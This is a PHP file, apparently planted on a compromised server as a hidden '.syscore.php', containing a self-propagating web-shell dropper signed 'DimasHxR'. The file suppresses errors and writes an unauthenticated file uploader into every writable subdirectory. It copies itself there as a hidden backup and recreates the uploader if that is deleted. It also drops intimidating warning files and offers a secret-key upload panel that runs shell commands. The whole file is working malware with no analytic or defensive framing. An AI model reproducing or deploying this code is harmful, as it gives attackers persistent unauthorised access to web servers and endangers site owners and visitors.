File: //opt/cloudlinux/alt-php52/root/link/.syscore.php
<?php
@set_time_limit(0);
@ini_set('display_errors', 0);
@error_reporting(0);
$main_file = 'dhxr.php';
$backup_file = '.syscore.php';
$marker_name = '.dhxrsig';
$warning_message = 'NOTICE:
\n
\nThis file is monitored.
\n
\nDeleting it may trigger system lockdown or data corruption.
\n
\n- DimasHxR';
$spread_log_file = '.spreadlog.txt';
$resurrection_log = '.reslog';
$secret_key = 'dimas';
if (!file_exists($main_file) && file_exists($backup_file)) {
$uploader_code = '<?php
\necho "Priv8 Home Root Uploader by DimasHxR <br>";
\necho "<b>".php_uname()."</b><br>";
\necho "<form method=\'post\' enctype=\'multipart/form-data\'>
\n <input type=\'file\' name=\'idx_file\'>
\n <input type=\'submit\' name=\'upload\' value=\'upload\'>
\n </form>";
\n$root = $_SERVER[\'DOCUMENT_ROOT\'];
\n$files = $_FILES[\'idx_file\'][\'name\'];
\n$dest = $root.\'/\'.$files;
\nif(isset($_POST[\'upload\'])) {
\n if(is_writable($root)) {
\n if(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $dest)) {
\n $web = "http://".$_SERVER[\'HTTP_HOST\']."/";
\n echo "sukses upload -> <a href=\'$web/$files\' target=\'_blank\'><b><u>$web/$files</u></b></a>";
\n } else {
\n echo "gagal upload di document root.";
\n }
\n } else {
\n if(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $files)) {
\n echo "sukses upload <b>$files</b> di folder ini";
\n } else {
\n echo "gagal upload";
\n }
\n }
\n}
\n?>';
if (@file_put_contents($main_file, $uploader_code)) {
$timestamp = date("Y-m-d H:i:s");
@file_put_contents($resurrection_log, "[RESURRECTED] $main_file restored from $backup_file at $timestamp\n", FILE_APPEND);
}
}
function spread_stealth_files($directory, $main_shell, $backup_shell, $marker, $warning, &$count, &$log_output) {
if (!is_dir($directory)) return;
$items = @scandir($directory);
if (!$items) return;
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$full_path = $directory . DIRECTORY_SEPARATOR . $item;
if (is_dir($full_path) && is_writable($full_path)) {
$target_main = $full_path . DIRECTORY_SEPARATOR . $main_shell;
$target_backup = $full_path . DIRECTORY_SEPARATOR . $backup_shell;
$target_marker = $full_path . DIRECTORY_SEPARATOR . $marker;
$target_warning = $full_path . DIRECTORY_SEPARATOR . 'readme_dont_delete.txt';
if (!file_exists($target_main)) {
$uploader_code = '<?php
\necho "Priv8 Home Root Uploader by DimasHxR <br>";
\necho "<b>".php_uname()."</b><br>";
\necho "<form method=\'post\' enctype=\'multipart/form-data\'>
\n <input type=\'file\' name=\'idx_file\'>
\n <input type=\'submit\' name=\'upload\' value=\'upload\'>
\n </form>";
\n$root = $_SERVER[\'DOCUMENT_ROOT\'];
\n$files = $_FILES[\'idx_file\'][\'name\'];
\n$dest = $root.\'/\'.$files;
\nif(isset($_POST[\'upload\'])) {
\n if(is_writable($root)) {
\n if(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $dest)) {
\n $web = "http://".$_SERVER[\'HTTP_HOST\']."/";
\n echo "sukses upload -> <a href=\'$web/$files\' target=\'_blank\'><b><u>$web/$files</u></b></a>";
\n } else {
\n echo "gagal upload di document root.";
\n }
\n } else {
\n if(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $files)) {
\n echo "sukses upload <b>$files</b> di folder ini";
\n } else {
\n echo "gagal upload";
\n }
\n }
\n}
\n?>';
if (@file_put_contents($target_main, $uploader_code)) {
$count++;
$log_output .= "[SPREAD] $target_main\n";
}
}
if (!file_exists($target_backup)) {
$current_stealth_code = file_get_contents(__FILE__);
@file_put_contents($target_backup, $current_stealth_code);
$log_output .= "[BACKUP] $target_backup\n";
}
@file_put_contents($target_marker, "DimasHxR Stealth Guard - " . date('Y-m-d H:i:s'));
@file_put_contents($target_warning, $warning);
spread_stealth_files($full_path, $main_shell, $backup_shell, $marker, $warning, $count, $log_output);
}
}
}
$spread_count = 0;
$spread_log_content = "";
spread_stealth_files(__DIR__, $main_file, $backup_file, $marker_name, $warning_message, $spread_count, $spread_log_content);
if ($spread_count > 0 || $spread_log_content != "") {
$log_header = "=== DIMASHXR STEALTH SPREAD LOG ===\nGenerated: " . date('Y-m-d H:i:s') . "\n\n";
@file_put_contents($spread_log_file, $log_header . $spread_log_content . "\n=== TOTAL FOLDERS: $spread_count ===\n");
}
if (isset($_GET['up']) && $_GET['up'] === $secret_key) {
echo '<!DOCTYPE html>
<html>
<head>
<title>DimasHxR Stealth Uploader</title>
<style>
body { background: #1a1a1a; color: #fff; font-family: Arial; padding: 20px; }
.container { max-width: 600px; margin: 0 auto; background: #2a2a2a; padding: 20px; border-radius: 8px; }
h3 { color: #6cf; margin-top: 0; }
input[type="file"] { background: #333; color: #fff; padding: 8px; border: 1px solid #444; border-radius: 4px; width: 100%; }
button { background: #6cf; color: #000; padding: 10px 20px; border: none; border-radius: 4px; cursor: pointer; margin-top: 10px; }
.success { color: #6cf; padding: 10px; background: #2a2a2a; border-radius: 4px; }
.error { color: #f66; padding: 10px; background: #2a2a2a; border-radius: 4px; }
</style>
</head>
<body>
<div class="container">
<h3>🔒 DimasHxR Stealth Uploader</h3>
<form method="post" enctype="multipart/form-data">
<input type="file" name="f" required>
<button type="submit">🚀 Upload File</button>
</form>
</div>';
if (isset($_FILES['f'])) {
$uploaded_file = $_FILES['f']['name'];
if (@move_uploaded_file($_FILES['f']['tmp_name'], $uploaded_file)) {
echo "<div class='container success'>✅ Upload successful: <b>" . htmlspecialchars($uploaded_file) . "</b></div>";
echo "<div class='container'><h4>📁 File List:</h4><pre>" . shell_exec("ls -la") . "</pre></div>";
} else {
echo "<div class='container error'>❌ Upload failed for: " . htmlspecialchars($uploaded_file) . "</div>";
}
}
echo '</body></html>';
exit;
}
if (!file_exists($main_file)) {
$uploader_code = '<?php
\necho "Priv8 Home Root Uploader by DimasHxR <br>";
\necho "<b>".php_uname()."</b><br>";
\necho "<form method=\'post\' enctype=\'multipart/form-data\'>
\n <input type=\'file\' name=\'idx_file\'>
\n <input type=\'submit\' name=\'upload\' value=\'upload\'>
\n </form>";
\n$root = $_SERVER[\'DOCUMENT_ROOT\'];
\n$files = $_FILES[\'idx_file\'][\'name\'];
\n$dest = $root.\'/\'.$files;
\nif(isset($_POST[\'upload\'])) {
\n if(is_writable($root)) {
\n if(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $dest)) {
\n $web = "http://".$_SERVER[\'HTTP_HOST\']."/";
\n echo "sukses upload -> <a href=\'$web/$files\' target=\'_blank\'><b><u>$web/$files</u></b></a>";
\n } else {
\n echo "gagal upload di document root.";
\n }
\n } else {
\n if(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $files)) {
\n echo "sukses upload <b>$files</b> di folder ini";
\n } else {
\n echo "gagal upload";
\n }
\n }
\n}
\n?>';
@file_put_contents($main_file, $uploader_code);
}
if (!file_exists($marker_name)) {
@file_put_contents($marker_name, "DimasHxR Stealth Guard - Active since " . date('Y-m-d H:i:s'));
}
echo "<!-- DimasHxR Stealth Guard Active -->";
?>